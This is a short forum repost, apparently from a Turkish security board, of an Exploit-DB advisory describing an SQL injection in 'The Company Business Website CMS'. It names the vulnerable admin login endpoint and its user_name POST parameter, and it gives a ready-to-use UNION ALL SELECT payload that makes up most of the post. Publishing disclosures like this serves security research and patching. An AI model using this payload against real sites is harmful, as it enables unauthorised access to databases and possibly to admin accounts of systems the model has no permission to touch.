The Company Business Website CMS - 'user_name' SQL Injection

Kacamax · 22 Mar 2019

# Exploit Basligi / Exploit Title: The Company Business Website CMS - 'user_name' SQL
Injection
# Tarih / Date: 20.03.2019
# Exploit Yazar / Exploit Author: Ahmet Ümit BAYRAM
# Yapimci Adresi / Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Adresi / Demo Site: 20170502--832559-2888cbce58aab6e518c3.png (490×520)
# Versiyon / Version: Lastest
# Test Edilen Sistem / Tested on: Kali Linux
# CVE: N/A

Exploit:

Kod:

[B][COLOR="Red"]----- PoC: SQLi -----[/COLOR]

[COLOR="red"]Istek:[/COLOR] http://localhost/[PATH]/admin/production/login.php
[COLOR="red"]Acikli Parametre:[/COLOR] user_name (POST)
[COLOR="red"]Payload:[/COLOR] user_name=VNfn' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
WMfV&user_password=&loggin=Psop[/B]

Exploit Adresi:
https://www.exploit-db.com/exploits/46586

The Company Business Website CMS - 'user_name' SQL Injection

Kacamax

Katılımcı Üye

Sosyal medya sayfalarımız